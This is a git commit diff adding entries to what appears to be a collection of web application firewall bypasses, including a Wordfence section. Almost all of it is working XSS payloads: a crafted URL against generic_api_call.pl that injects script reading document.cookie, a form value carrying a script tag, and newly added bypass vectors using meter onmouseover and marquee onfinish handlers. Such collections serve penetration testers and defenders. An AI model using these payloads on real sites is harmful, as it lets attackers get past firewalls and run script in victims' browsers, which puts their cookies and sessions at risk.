New wordfence Bypasses added

This commit is contained in:
0xInfection 2019-03-21 23:47:46 +05:30 committed by root
parent 1f808549a0
commit 081589b316

View File

@ -2405,7 +2405,7 @@ http://host/index.php/wp-json/wp/v2/users/
</soapenv:Envelope> </soapenv:Envelope>
``` ```
- `generic_api_call.pl` XSS by [@NNPoster](https://www.exploit-db.com/?author=6654) - [`generic_api_call.pl` XSS](https://www.exploit-db.com/exploits/30777) by [@NNPoster](https://www.exploit-db.com/?author=6654)
``` ```
http://host/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e http://host/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e
``` ```
@ -2692,6 +2692,12 @@ value="<script>alert(document.cookie)</script>">
</body> </body>
</html> </html>
``` ```
- [Other XSS Bypasses](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md)
```
<meter onmouseover="alert(1)"
'">><div><meter onmouseover="alert(1)"</div>"
>><marquee loop=1 width=0 onfinish=alert(1)>
```
### Apache Generic ### Apache Generic
- Writing method type in lowercase by [@i_bo0om](http://twitter.com/i_bo0om) - Writing method type in lowercase by [@i_bo0om](http://twitter.com/i_bo0om)